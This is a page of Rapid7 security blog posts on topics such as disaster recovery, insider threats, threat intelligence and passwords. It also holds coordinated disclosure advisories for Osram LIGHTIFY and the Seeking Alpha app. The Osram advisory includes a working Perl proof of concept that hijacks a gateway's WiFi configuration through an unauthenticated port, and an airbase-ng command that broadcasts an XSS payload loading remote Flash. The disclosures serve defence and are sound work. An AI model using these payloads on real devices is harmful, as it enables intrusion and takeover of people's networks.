Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

665 posts

In case you haven't yet met someone from Rapid7, you should know that we care about improving security at all companies. We have no interest in selling you products that are going to sit on your shelf, so I recently wore makeup for the first time and sat down for a live videocast with Sara Peters from Dark Reading and John Pironti from IP Architects to talk through how organizations can get their people, process, and technology working together to prioritize and respond to security threats in real time.thats-how-you-debate.jpg

 

So what did we discuss? Somehow, I didn't black out like Frank the Tank in the all-important debate to save the frat, so I remember three major themes we hadn't really planned prior to the cameras starting to roll: preparation, being realistic, and data vs. intelligence.

 

What do I mean by this? Well, I hate watching myself on video, so I'll paraphrase from memory:

 

Preparation

No security team, no matter the skill level, can be dropped into a new organization and start responding to threats in real time. There needs to be a great deal of attention to the basics of security hygiene, getting buy-in from leadership on the approach, and operating according to plan. No technology is going to solve this for us; the team of IT, InfoSec, and Risk stakeholders need to develop playbooks as a group, test themselves as a group, and develop the level of trust in each other necessary to take action right as problems arise. The "test themselves as a group" part is rarely done, but might be the most valuable piece for improving overall effectiveness.

 

Being realistic

Dont-Worry-About-The-Wrong-Things.jpgMultiple times in our discussion, we brought up the unrealistic scenarios for most businesses. Should you be worried about nation state attacks? Do you need to protect against Stuxnet? Do you need to rush to protect yourself against the latest zero-day with a logo and catchy name? The answer to all three of these questions is: most likely not. Your focus should first be on defending the assets at the core of your business against the opportunistic attacks that use well-known exploits. Additionally, if you aren't involved in helping the organization adopt the latest technology that makes it productive, they are going to be used anyway - just not in a secure fashion.

 

Data vs. intelligence

This topic of data needing context to become information and needing to be relevant to you to actually constitute intelligence has been a common discussion topic at Rapid7 lately. We all agreed that threat intelligence is not just a list of IP addresses from an unknown source, but an organization's log and other machine data are no different. Your goal should be to get the right information for you team, not simply accessing all of the data.

 

To watch the full video on-demand, even if only to get black mail screen grabs of me in makeup, check it out here:

Prioritizing And Responding To Security Threats In Real Time - Webcast - 2016-08-16 13:00:00 EDT

 

If you want to learn more about the various ways Rapid7 can help your business, our Advisory Services are often a good place to start.

...and then it might be too late.

 

 

Recently, Delta Airlines suffered a weeklong outage that, if you take it on it's face, ticks just about every box on a security person's disaster recovery planning scenario.

 

Delta has given multiple interviews on what happened. Although details are still being pieced together, essentially the company had a power issue, and when it tried to go to backup systems, they had failures. I managed a data center for several years, and this what keeps data center mangers up at night: the what-if-it-doesn't-come-back-up scenario.

 

The outage cost Delta millions of dollars in recovery effort, including vouchers that were given to customers who were inconvenienced. They severely impacted travelers by cancelling hundreds of flights, and likely suffered some reputational damage.

 

Hindsight being 20/20, this scenario - with good risk management - can be avoided, or at the very least can be reduced, but it takes awareness, resources and buy in from top management. Ed Bastian, the CEO of Delta, has taken personal responsibility for the failure. We can expect significant internal review of the disaster preparedness scenarios their IT teams are involved in.

 

Business continuity and disaster recovery is also a security professional's concern, impacting the CIA triad's most demanding principle, Availability. Availability means that information is available to users when they need it. Availability can take many different forms, depending on the business context. Delta, as a company which operates 24x7x365, relies on availability and any impact to that also impacts the timing of fleet operations. Even minor disruptions cause cascades which severely and adversely affect the business. Sensitivity to availability is one reason it took so long for Delta to fully recover; the longer they stayed down the worse the problem got amplified.

 

"The system moved to backup power but not all the servers were connected to it," Bastian told the WSJ.

 

Documentation is a key to all disaster planning. You have to understand in your disaster recovery (DR) plan what will and will not be part of your backup system. It is very expensive to maintain a full replica of your systems, so your DR plan might account for only a partial recovery. The business risk of a partial recovery must be documented and communicated so everyone understands what will happen in a disaster scenario. Bastian commented "We did not believe, by any means, that we had this kind of vulnerability."

 

Use this issue, and that of a few weeks earlier of Southwest Airlines that lasted four days, to review your business continuity/disaster recovery plans, and especially create them if you don't have any in place. Test your recovery plans at regular intervals, using tabletop walkthroughs and actual recovery techniques, and make upper management aware of the outcomes. Use these results to drive improvements in planning for availability, and you can avoid or reduce the impact of a disaster scenario. And always remember to revisit and update your plan at regular intervals, especially at the conclusion of a test, to ensure you have up to date and relevant information.

 

At a minimum, your disaster plan should include:

 

  • Paper copies of everything relevant to the disaster plan; online resources will likely be disrupted, even if you have highly available systems or cloud-based ones
  • Contact information of all relevant stakeholders in a disaster; C-levels, technicians, business people, customers; anyone who would need to be part of the recovery scenarios; include physical addresses of sites and phone numbers of required resources
  • A list of required vendors your organization needs to operate in the event of a disaster scenario; include contact information for those vendors
  • A map of all systems which would function on backup power; include all the networking devices between the systems (switches, routers, storage); map the systems to business functions so you can see visually which functions would be disrupted and which would be operational
  • Maps of physical locations that are relevant to disaster recovery
  • Forms which are critical to business operations such as supply order forms, injury reports, expense tracking, etc
  • Disaster declaration procedures, and communication procedures (who to contact when, who is in charge of media relations, etc)
  • Checklists and runbooks on operations processes - specifically this is required so the distractions of a disaster do not impact running operations, and don't require memory or specific skill to accomplish

 

This is just a short list, and does not go into the specifics of disaster planning, but it's a good start and validation point. Once you have checked off this list, start to look at recovery time objectives (RTO), recovery point objectives (RPO), and true business continuity process (processes which allow business to continue uninterrupted, even during an outage). There's a host of resources online and third party providers which are available to help.

 

According to the WSJ article, “It’s not clear the priorities in our investment have been in the right place,” Mr. Bastian said. “It has caused us to ask a lot of questions which candidly we don’t have a lot of answers for.” Upper management can be reluctant to put money into disaster recovery, seeing it more as an insurance policy, which it partially is. Testing isn't just to vet your plans, it's also to ensure that priorities get positioned correctly. If testing shows that not all systems would be recoverable, then investment can justified.

 

Disaster planning requires time and some resources to accomplish. This is an investment in the future, and any time invested now will be offset by the reduction in recovery time later, and hopefully, the lessened impact on your business operations.

Read most security vendors’ websites (yes, we know what we are) and you’ll generally find something about the terrifying “Risk of Insider Threats.” Rogue employees are lurking around every corner. You try to hire good honest people, brimming with integrity, but still these evildoers slip through the net and before you know it they are trying to take

you down. They don’t care that you have a family to feed, that you put your life and soul into creating a flourishing cave.jpgbusiness. Maybe you should just go self-employed. Switch off the internet and go back to pen and paper. Reduce the risk completely and become a cave-dwelling hermit. Actually, can you come back out of the cave and turn the internet back on for a moment please? Thanks.

 

I hope the mild exaggeration in the above paragraph was apparent. And if that’s the reality in your business perhaps it’s time to rethink your hiring strategy (and maybe go back to the cave after all, it was nice in there right?). Most of your employees really like you having a business, they don’t want to ruin it, and they aren’t going to do something purposely malicious. There is a BUT coming, though. Actually, there are two, because reality is a harsh mistress.

BUT #1... Insider threats are real.

I’m sorry, I’m being That Vendor. We haven’t invented this as an industry, I promise. It does only take one person to cause a lot of potential damage – take the recent Sage data breach as an example. Hundreds of detailed financial customer records accessed by an unauthorised* employee. A the time of writing this, the Sage investigation is ongoing - an arrest has been made, and a lot of Sage's customers have received a notification that their details may have been on the list. Like I said, it just takes one.

 

*that isn't a typo btw, I’m from that tiny island over the pond, we just don't do zeds with the same level of enthusiasm that Americans do #sorrynotsorry

 

BUT #2... Unwitting insider threats are a much greater concern.

This isn’t a disgruntled employee, it’s someone who can easily open up your business to the evils of the outside world. They clicked on a dodgy Facebook link from a friend, they opened up an "invoice" which turned out to be hiding malicious code, they chomped down on the hook of a phishing email and before you can say Wicked Tuna, there’s a keylogger or tuna.jpgworse sitting on their PC. Their user credentials get captured and delivered off to someone truly malicious outside of your organisation. Your employee didn’t mean to cause a problem, they just didn’t know any better.  And they’d possibly do the same thing all over again tomorrow.

 

Understanding the risk posed by your employees, the users of your systems, the people who access critical data that’s key to your business is so much bigger than worrying about the occasional rogue employee.

 

Bonus BUT (because marketing)... Compromised user credentials behave just like insider threats

Protecting assets is an important part of any security program, no doubt about it, but a huge number of data breaches are caused by compromised user credentials (the Verizon Data Breach Investigations Report has this as the top method of attackers breaching a network every year from 2013). These are user accounts that look, feel and smell like the real deal because That’s Exactly What They Are. They just got into the wrong hands. And if you fall into the 60% of organisations who have no way to detect compromised credentials, you won’t be able to tell the difference between a bona fide user and an attacker using a compromised account. On the plus side, they won't be hogging the drinks table at your summer party, but that's really the smallest of wins.

 

Call to action: Don’t be a hermit!

If you’re thinking seriously about that cave option again, it’s OK, you don’t need to (unless cave dwelling is actually your thing, but let’s assume otherwise because it’s a little niche). Take stock, think about where your weak spots are. Would your employees benefit from some up-to-date security awareness training? How robust are those incident response processes?  When did you last health-check your overall security program? Do you have the capabilities to quickly spot an attacker who’s got their grubby mitts on the keys to your metaphorical castle (or cave, obvs)?

 

If the answers to those questions aren’t clear, we can help you get a plan together. You can gain the insight you need to be able to protect your business. Visit our web page on compromised credentials and learn more about how we can help you achieve this.

 

Samantha Humphries

The SANS State of Cyber Threat Intelligence Survey [PDF] has been released and highlights some important issues with cyber threat intelligence:

 

Usability is still an issue - Almost everyone is using some sort of cyber threat intelligence. Hooray! The downside – there is still confusion as to the best ways to implement and utilize threat intelligence, and the market is not making it any easier. We believe that the confusion is related to the initial push by threat intelligence vendors to sell list-based threat intelligence – lists of IPs, lists of domains, etc – with little, or even worse, no context. This type of threat feed is data, not intelligence, but it is easy to put together and it isn’t too difficult to integrate with security tools that are used to receiving blacklists or signature based threat data. That…well…to put it nicely, doesn’t exactly work. The survey shows that over 60% of respondents are using threat intelligence to block malicious domains or IP addresses, which contributes to high false positives and a nebulous idea of what threat intelligence is actually supposed to be doing. However, nearly half use threat intelligence to add context to investigations and assessments, which is a much better application of threat intelligence and even though it uses some of the same data sources, it requires the additional analysis that actually turns it into intelligence. A smaller number of respondents reported that they use threat intelligence for hunting or to provide information to management (28 and 27 percent, respectively), but it appears that these areas are growing as organizations identify the value they provide.

 

Threat Intelligence helps to make decisions - 73% of respondents said that they felt they could make better and more informed decisions by using threat intelligence. 71% said that they had improved visibility into threats by using threat intelligence. These are both key aspects of threat intelligence and indicate that more organizations are using threat intelligence to assist with decision making rather than only focusing on the technical, machine to machine aspect of threat intel.  One of the overarching goals in intelligence work in general is to provide information to decision makers about the threats facing them, and it is great to see that this application of CTI is growing. CTI can be used to support every aspect of a security program, from determining general security posture and acceptable level of risk to prioritizing patching and alerting, and threat intelligence can provide insight to support all of these critical decisions.

 

More isn’t necessarily better – the majority of respondents who engage in incident response or hunting activities indicated that they could consume only 11-100 indicators of compromise on a weekly basis, and can only conduct in-depth research and analysis on 1-10 indicators per week. Since there are approximately eleventy-billion indicators of compromise being generated and exchanged every week that puts a lot of pressure not only on analysts, but on the tools we use to automate the collection and processing of data. Related – two of the biggest pain points respondents had with implementing cyber threat intelligence are the lack of technical capabilities to integrate CTI tools into environments, and the difficulty of implementing new security systems and tools. In order to automate the handling of large amounts of indicators in a way that allows analysts to zero in on the most important and relevant ones, we need to have confidence in our collection sources, confidence in our tools, and confidence in our processes. More of the wrong type of data isn’t better, it distracts from the data that is relevant and makes it nearly impossible for a threat intelligence analyst to actually conduct the analysis needed to extract value.

 

To learn more about our approach to integrating threat intelligence into incident detection and response processes, come join us for an IDR intensive session at our annual conference, UNITED Summit.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Small and medium-sized businesses (SMBs) have it made in terms of security. No, I’m not referring to the threats, vulnerabilities, and business risks. Those are the same regardless of the size of the organization. Instead, I’m talking about how relatively easy it is to establish and build out core information security functions and operations when the business is small. Doing this in an organization with a handful of employees – maybe a dozen or two – that has a simple network and application environment (in-house and in the cloud) is unbelievably simple compared to doing it in larger organizations.

 

I’ve helped several small businesses build out their policies, security testing/assessment processes, and technologies over the years and it’s so neat to see how they’ve been able to progress from essentially firewalls and anti-virus to a full-blown IT/security governance program that rivals that of any large enterprise – all with minimal effort over time, relatively speaking. It’s the equivalent of parents establishing good habits around eating and exercising in young children that they learn from and build upon for the rest of their lives instead of doctors and dieticians having to convince a 45-year old type 2 diabetic that he has to change his entire lifestyle if he’s going to fix his heart problems and live past 50. The former is much easier (and less costly) than the latter.

 

One of the biggest challenges with SMBs is that they may not think they’re a target, that they don’t have to comply with the various security and privacy regulations, or that they even know about information security practices at all. The former two resolve themselves pretty quickly through breaches and pressures from business partners and customers who are often large businesses that have stringent security requirements. The latter is the biggest concern in large part due to these business’s third-party IT consultants/service providers not fully understanding security. Many, perhaps most, small businesses start out using an outside IT services provider and I’ve witnessed a fox guarding the henhouse situation numerous times over the years whereby these outside providers implement firewalls, anti-virus software, and data backup solutions and that’s where security begins and, unfortunately, ends.

 

Another situation that builds on this is something I see with many smaller businesses: technologies and policies are put in place but a security assessment is never performed to determine where things truly stand. It's the cart before the horse. The builder remediation before the home inspection. The chemotherapy before the CT scan. You can’t force people to look past their false sense of security but it sure is a big oversight in the SMB space that needs some quick attention.

 

So, SMB security is simple but it can be kind of complicated if it’s made out to be. The choice is yours – focus on security now while you’re young and reap the rewards of simplicity or put it off so it’s more expensive and exponentially more complicated when you’re forced to address it down the road. If you own, work for, or serve as a consultant to a small or medium-sized business, make the decision to start and build out a basic information security program. Don’t wait, get started on it now and grow into it over time. It’ll look after itself as complexity grows with the business and will be so much easier to tweak that having to start from scratch. Something that I can say with conviction because I’ve been a part of it: you will not regret it.

First off: Hi! I’m the new community manager here at Rapid7. And like many in the security community, I’ll be heading to Vegas for Black Hat, BSidesLV and DEF CON in a little more than a week. I’m looking forward to diving right in to meeting the community and learning from some of the smartest professionals in the industry. I’ve prepped by reading last year’s Black Hat Attendee Guide and if you’re heading to Vegas, I recommend you take a look, too.

 

I’d also like to introduce you to someone else. The Rapid7 Moose.

 

At Rapid7, we refer to ourselves as "Moose" because the plural and the singular is the same word. When we refer to ourselves as moose, we are saying that while we all strive for excellence as individuals, we are stronger working together as a team with shared goals.  And we firmly believe this extends to our customers and community. After all, by working together, the community is able to support and educate each other to keep fighting for better security.

 

To demonstrate this philosophy about community-based security, and the power of working together, we will be introducing the Moose at our Black Hat Booth, #532.  We’re talking about a nine-foot moose here, so we encourage you to come by and take some photos with the Moose and share them on Twitter to enter our Black Hat sweeps.

 

Here’s the scoop:

Take a picture with our moose, tag #BHUSA and @rapid7 to be entered to win an Oculus Rift. Can’t come to the booth? Just share a moose pun or joke with @rapid7 and tag #BHUSA and you’ll be entered as well! Sweeps will open on August 3 and close on August 5 (plenty of time to get those pics uploaded or jokes shared after exhibits close). See below for official terms and conditions.

BH Contest Twitter Image 1024x512.jpg

 

 

Rapid7 Black Hat Twitter Sweeps

Terms & Conditions

 

The promotion is only open to residents in the United States and Canada who must be aged 18 or over.

 

No purchase is necessary to participate in the sweeps. Eligibility is dependent on following the entry rules outlined in this guide. Multiple entries will be accepted; however, no third party or bulk entries will be accepted. Entry submissions may not contain, as determined by Rapid7, any content that is obscene or offensive or violates any law.

 

To enter: On Twitter, share a post that includes either 1) a picture of the moose from Black Hat Booth #532 and the tag #BHUSA and @rapid7 or 2) a moose pun and the tag #BHUSA and @rapid7.

 

The sweeps will open on Wednesday, August 3, 2016 at 09:00:01 a.m. PT and close on Friday, August 5, 2016 at 09:59:59 p.m. PT. Entries made after these times will not be accepted.

 

One winner will be picked at random from the received eligible entries for the sweeps. The draw will take place by Tuesday, August 9 by 11:59:59 p.m. ET. The winner will be notified via the Rapid7 Twitter page and will have 48 hours to respond via direct message to claim the prize. If the prize is unclaimed after 48 hours, an alternate winner will be selected.

 

The prize for this sweeps is an Oculus Rift (estimated value $599) and will be shipped as soon as possible after the date of response from the winner. Prize is non-transferable or exchangeable. No cash or credit alternative is available. Should the prize become unavailable for any reason, Rapid7 reserves the right to provide a substitute prize of approximately equivalent or greater value. The winner list can be obtained after Monday, August 22, 2016 by emailing community @ rapid7 (dot) com.

 

Sweeps host is Rapid7 LLC, 100 Summer St, Boston, MA 02110.

 

By entering the sweeps, you agree to these terms and conditions. Employees and the immediate families of Rapid7 may not participate.

 

If you have any concerns or questions related to these terms and conditions, please email community @ rapid7 (dot) com.

Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description

Status

Platform

R7 ID

CVE

Cleartext WPA2 PSK

Fixed

Home

R7-2016-10.1

CVE-2016-5051

Lack of SSL Pinning

Unfixed

Home

R7-2016-10.2

CVE-2016-5052

Pre-Authentication Command Execution

Fixed

Home

R7-2016-10.3

CVE-2016-5053

ZigBee Network Command Replay

Unfixed

Home

R7-2016-10.4

CVE-2016-5054

Web Management Console Persistent XSS

Fixed

Pro

R7-2016-10.5

CVE-2016-5055

Weak Default WPA2 PSKs

Fixed

Pro

R7-2016-10.6

CVE-2016-5056

Lack of SSL Pinning

Unfixed

Pro

R7-2016-10.7

CVE-2016-5057

ZigBee Network Command Replay

Unfixed

Pro

R7-2016-10.8

CVE-2016-5058

Cached Screenshot Information Leak

Fixed

Pro

R7-2016-10.9

CVE-2016-5059

 

Product Description

According to the vendor's January, 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is used for both residential and commercial customers, using either the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape, and is compatible with other ZigBee based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad revealed the WiFi WPA pre-shared key (PSK) of the user's home WiFi as stored in cleartext in the file, /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1- 40ECBDBDF692/Library/Preferences//com.osram.lightify.home.plist. Examining this file reveals the cleartext string as shown in Figure 1:

Figure 1, Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to prevent storing potentially sensitive information, such as WiFi PSKs and passwords in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and require at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => TCP,
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the Zigbee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture and replay the Zigbee communication at any time, and replay those commands to disrupt lighting services without any other form of authentication.

Mitigation for R7-2016-10.4

Current Zigbee Home Automation Protocol Standard suffers from vulnerabilities preventing the ability to proper secure the Zigbee Home Automation protocol. The solution to resolving these inherent security flaws require fixing of the core protocol, which is under the control of the Zigbee alliance (http://www.zigbee.org/

 

Absent corrections of the Zigbee Home Automation protocol, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

bash airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor supplied patch should enforce that all data should be filtered and special characters such as > and <should be properly escaped before being displayed by the web management console.

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight character PSK using only the characters from the set "0123456789abcdef". This extremely small keyspace of limited characters and a fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement a longer default PSKs utilizing a larger keyspace that includes both uppercase and lowercase alphanumeric characters and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs with the above advice, and not rely on the shipped defaults by the vendor.

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application was caching screenshot of the current page when the IPAD home button was selected in the folder, /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433AB0A1- EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osr am.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the IPAD device. As shown in Figure 7, the plain text password of the gateway is displayed in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should use a default page for the Downscale function when the home button is pressed, and that all passwords and keys displayed on the application configuration pages be obfuscated with asterisks.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

 

Update (Aug 10, 2016): Added a note about the Zigbee protocol for R7-2016-10.4 in the summary section.

Over the last few months, Jordan Rogers and I have been speaking about the benefits of doing the basics right in information security.

 

Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips.

 

We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU, where it was filmed and uploaded to YouTube.

 

Take a look if you'd like to hear the perspective of an Incident Response person combined with a Blue Team person, information from real problems we observed, as well as recommendations on how to mitigate those issues!

 

From the trenches: Breaches, Stories, Simple Security Solutions - YouTube

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Recently, I wrote about my thoughts on why we feel like we have to force short-term password changes in the name of “security.” Since that time, Microsoft made an announcement to step in and help set its users (and itself) up for success with more stringent password requirements for Microsoft Account and Azure Active Directory. Sad it has come to this – a vendor doing what they must do to force people to use stronger passwords. We’re devolving as computer users.

 

Shown in study after study, i.e. Ponemon, Verizon, and (especially) this insightful research from Rapid7: the basics are ignored, we cry out for newer and better security controls, government regulations grow – and, yet, nothing gets better. Apparently the information security basics such as weak passwords are just too much to ask for. Take for instance, the work Security, Accuracy, and Privacy in Computer Systems – a great book written by the late James Martin. It covers all sorts of security basics – what’s needed and how to balance it all out. That book was written in 1973. We still can’t get security right. Not even passwords.

 

So, what is the answer? Is it IT’s fault? IT and security teams, and the executives heading things up are certainly complicit. Some ignore password vulnerabilities. Some have trouble getting their messages across. Others are afraid to say anything, especially given the predictable pushback from management. Users are on the hook as well. As much as we try to set them up for success through technical controls and awareness/training, at some point, they need to be held accountable. They’re grown-ups and it’s not like this whole computer password thing is something new.

 

Maybe we should continue down the path of making things more complex through regulations, lawyers, and technical controls that promise to make everything better. Ha! Not unlike attempts at failed social initiatives involving emotional responses to crises rather than due process, I suspect we’ll continue down the path of more laws, more policies, more audits, and a growing false sense of security. Our current approach to passwords is not working. Maybe that’s okay – perhaps someone else can figure it out down the road.

 

Mark Matteson was quoted as saying “Good habits are hard to form and easy to live with. Bad habits are easy to form and hard to live with. Pay attention. Be aware. If we don’t consciously form good ones, we will unconsciously form bad ones.” With weak passwords – more than any other computer security vulnerability - what I believe we need is need is discipline. Discipline on the part of IT and security teams. Discipline on the part of users. Discipline on the part of management. That and some backbone to see things through over time (again, especially with passwords) until the challenges are resolved. Unless and until something changes in this area, I suspect we’ll continue down this path of ignorant bliss and continued breaches.

Due to a lack of encryption in communication with the associated web services, the Seeking Alpha mobile application for Android and iPhone leaks personally identifiable and confidential information, including the username and password to the associated account, lists of user-selected stock ticker symbols and associated positions, and HTTP cookies.

Credit

Discovered by Derek Abdine (@dabdine) of Rapid7, Inc., and disclosed in accordance with Rapid7’s disclosure policy.

Product Description

Seeking Alpha provides individuals with the ability to track and quantify their stock portfolio holdings. The vendor’s website states “Seeking Alpha is a platform for investment research, with broad coverage of stocks, asset classes, ETFs and investment strategy. In contrast to other equity research platforms, insight is provided by investors and industry experts rather than sell-side analysts.”

Exploitation

An attacker in a privileged position on the target's network can intercept, view, and modify communications between the Seeking Alpha mobile application and its associated web services trivially, due to the reliance on HTTP cleartext communications, rather than HTTPS. HTTP is used for routine polling for stock ticker symbols the user has configured, which may reveal overly personal financial information about the user that could be used in a targeted attack.

 

In addition, HTTP is used for the authentication sequence. The user's full e-mail address, password, and HTTP session tokens are transmitted in the clear, as are less critical elements such as the fingerprintable User-Agent (which reveals build and platform information).

 

In this sample, a user login information (username, password) may be obtained using a simple packet capture:

 

Mobile device characteristics can also be retrieved (Android OS version and Android Device Token are present):

 

Furthermore, persistent session information (the user ID, email address and the session token aka “user_remember_token”) is clearly visible:

 

Stock ticker symbols are also included (either when added, or when receiving portfolio holdings, which may include positions per symbol if the user has entered those):

 

Curiously, HTTPS requests to https://seekingalpha.com using a normal browser on a traditional PC or laptop are also redirected to HTTP services, rather than the reverse. This includes the authentication sequence. This observation seems to indicate that the preference for HTTP over HTTPS appears to permeate through the engineering practices at Seeking Alpha.

Mitigation

Until Seeking Alpha provides a fix for the mobile application, users are strongly advised to not use the application while connected to untrusted networks. The use of a VPN will also help alleviate the most likely risk of a nearby eavesdropper on a public network, but note that this would protect communication only as far as the VPN endpoint.

Disclosure Timeline

This vulnerability is being disclosed in accordance with Rapid7's disclosure policy.

 

  • Tue, May 03, 2016: Initial contact to security@seekingalpha.com and other aliases.
  • Wed, May 19, 2016: Confidential disclosure to CERT (VR-142).
  • Wed, Jul 13, 2016: Public disclosure (planned).


